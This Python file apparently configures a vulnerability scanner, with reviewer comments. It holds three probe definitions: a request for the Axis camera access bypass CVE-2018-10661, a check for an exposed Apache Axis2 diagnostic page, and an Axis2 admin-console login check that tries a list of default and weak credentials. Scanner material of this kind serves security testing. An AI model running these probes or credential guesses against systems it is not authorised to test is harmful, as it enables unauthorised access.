#coding=utf-8
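# Probe table: one dict per HTTP check. The code that consumes this table is
# not part of this file, so the field meanings below are read off the values
# and should be confirmed against the consumer:
#   requests_option   HTTP method used for the probe
#   url               path(s) requested on the target
#   params / data     query parameters / form body; a "%s" pair in data is
#                     presumably filled from username and password
#   flag              marker string(s) looked for in the response
#   success/fail/end  messages reported for the probe
#   admin_bursk       "True" only on the entry that carries credential lists;
#                     presumably switches credential guessing on
#   username/password candidate credentials; an empty string where unused
# NOTE(review): username/password are "" on the first two entries and lists on
# the third, so the consumer has to accept both types.
pocs = [
    # CVE-2018-10661 (access-control bypass in Axis network cameras). This is
    # a different product from the Apache Axis2 entries below.
    # NOTE(review): the method is GET although a form body is supplied; how the
    # consumer sends `data` for a GET is not visible here. Confirm.
    # NOTE(review): the marker "it_worked" is the same value submitted in
    # return_page, so a response that merely reflects request input would also
    # match. Treat a hit as a lead to verify, not as proof.
    {
        "requests_option": "GET",
        "url": ["/index.html/a.srv"],
        "params": [],
        "data": ["action=abc&return_page=it_worked"],
        "flag": ["it_worked"],
        "success": "exist CVE_2018_10661",
        "fail": "Not exist CVE_2018_10661",
        "end": "CVE_2018_10661 测试结束",
        "admin_bursk": "",
        "username": "",
        "password": "",
    },
    # Apache Axis2 "Happiness Page": a diagnostic page that discloses
    # environment details. A hit means the page is reachable without login;
    # the usual remediation is to remove it or restrict access to it.
    {
        "requests_option": "GET",
        "url": ["/axis2/axis2-web/HappyAxis.jsp"],
        "params": [],
        "data": [],
        "flag": ["Axis2 Happiness Page"],
        "success": "exist Axis Information Disclosure,/axis2/axis2-web/HappyAxis.jsp",
        "fail": "NOT exist /axis2/axis2-web/HappyAxis.jsp",
        "end": "/axis2/axis2-web/HappyAxis.jsp信息扫描完成",
        "admin_bursk": "",
        "username": "",
        "password": "",
    },
    # Apache Axis2 admin console login checked against a short list of default
    # and common credentials. A hit means the console accepted one of them;
    # the remediation is to change the password and limit who can reach
    # /axis2/axis2-admin/.
    # NOTE(review): `flag` holds five markers; whether the consumer requires
    # any one of them or all of them is not visible here. Confirm.
    {
        "requests_option": "POST",
        "url": ["/axis2/axis2-admin/login"],
        "params": [],
        "data": ["userName=%s&password=%s&submit=+Login+"],
        "flag": [
            "Administration Page</title>",
            "System Components",
            "axis2-admin/upload",
            "include page='footer.inc'>",
            "axis2-admin/logout",
        ],
        "success": "/axis2/axis2-admin/login存在弱口令",
        "fail": "/axis2/axis2-admin/login不存在弱口令",
        "end": "/axis2/axis2-admin/login弱口令扫描完成",
        "admin_bursk": "True",
        "username": ["axis_plugin_catalog", "admin", "manager", "root"],
        "password": [
            "",
            "axis_plugin_catalog",
            "axis2",
            "123456",
            "12345678",
            "password",
            "123456789",
            "admin123",
            "admin888",
            "admin1",
            "administrator",
            "8888888",
            "123123",
            "admin",
            "manager",
            "root",
        ],
    },
]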